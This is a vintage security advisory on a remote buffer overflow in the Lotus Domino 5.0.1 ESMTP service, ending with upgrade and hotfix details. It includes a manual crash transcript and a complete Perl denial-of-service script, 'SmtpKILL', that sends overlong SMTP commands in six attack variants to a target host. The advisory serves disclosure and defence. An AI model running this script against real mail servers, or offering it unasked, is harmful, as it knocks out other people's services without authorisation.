COMMAND

    Lotus ESMTP Service

SYSTEMS AFFECTED

    Lotus Domino Release 5.0.1 (Intl)

PROBLEM

    Michal  Zalewski  found  following.   Not  much  to   say.   While
    performing basic  input validation  checks in  Lotus Domino  ESMTP
    service (see  subject) running  on the  top of  Windows NT  system
    (this  applies  probably  to  other  platforms  as  well),  within
    approximately 30 seconds he  found remote buffer overflow  leading
    to system crash (and, if exploited, to remote system  compromise).
    Now, facts:

        220 *SNIP* Lotus Domino Release 5.0.1 (Intl) *SNIP*
        HELO dood
        250 *SNIP*
        MAIL FROM: me@<four-kilobytes-of-junk>
        (crash)

    This has been confirmed  on r5.0.2b on a  Sun E420R w/ patched  up
    Solaris  7,  WinNT4  (SP6)  and  5.03  (US  version;  crashed  the
    nSMTP.EXE task).

    Here's the test script:

    #!/usr/bin/perl
    # Need net::telnet to run
    # Expl0it By smiler@vxd.org
    # Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
    # CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
    # and probably many others that I hadnīt chance to explore.
    # I wrote this after Michal Zalewski brought this issue in BugTraq.
    # Cheers 351 and FractalG :)

    use Net::Telnet;


    print "SmtpKILL By smiler\@vxd.org\n";

    if (not $ARGV[1]) {
    print qq~
    Usage : smtpkill.pl  <type> <host>
	    <type> Type of attack :
		    type 1 = long mail from: someone\@4k_of_junk
		    type 2 = long rcpt to: someone\@4k_of_junk
		    type 3 = long helo longdomain_with_4k_of_junk
		    type 4 = long undefined command (4k_of_junk)
		    type 5 = long help 4k_of_junk
		    type 6 = long mail from: and mail to:

	    <host> Host that you want to DOS, Ip or Domain will be ok.
    Example Usage : smtpkill.pl 5 127.0.0.1
    ~; exit;}

    $type=$ARGV[0];
    $target=$ARGV[1];

    print "TYPE ATTACK: $type\n";
    print "TARGET : $target\n";



    for ($i=4096;$i<5096;$i++)
     {
            $obj=Net::Telnet->new( Host => "$target",Port => 25);

	    if ($type=~ "1") {
	    $helo="helo ptrulez";
	    $from="mail from: v0v0@". 'ptrulez' x $i;
	    $rcpt="rcpt to: v0v0\@v0v0.pt";
	    }

	    if ($type=~ "2") {
	    $helo="helo ptrulez";
	    $from="mail from: v0v0\@v0v0.pt";
	    $rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
	    }

	    if ($type=~ "3") {
	    $helo="helo ". 'ptrulez' x $i;
	    $from="mail from: v0v0\@v0v0.pt";
	    $rcpt="rcpt to: v0v0\@v0v0.pt";
	    }

	    if ($type=~ "4") {
	    $helo="havesomefun". 'ptrulez' x $i;
	    }

	    if ($type=~ "5") {
	    $helo="help ". 'ptrulez' x $i;
	    }

	    if ($type=~ "6") {
	    $helo="helo ptrulez";
	    $from="mail from: ". 'ptrulez' x $i;
	    $rcpt="rcpt to: ". 'ptrulez' x $i;
	    }

            print "$helo\n";$obj->print("$helo");
            print "$from\n";$obj->print("$from");
            print "$rcpt\n";$obj->print("$rcpt");
            $obj->close;
     }

SOLUTION

    Upgrade  modules  are  available.   Version  5.0.2c  (Intl) is not
    vulnerable.  Merak Server Version 2.10.270 is not also vulnerable.

    However, officially this bug has been fixed in Domino 5.04.   This
    version of Domino is not  available yet (not even by  QMR update).
    Customers can request a hotfix if needed.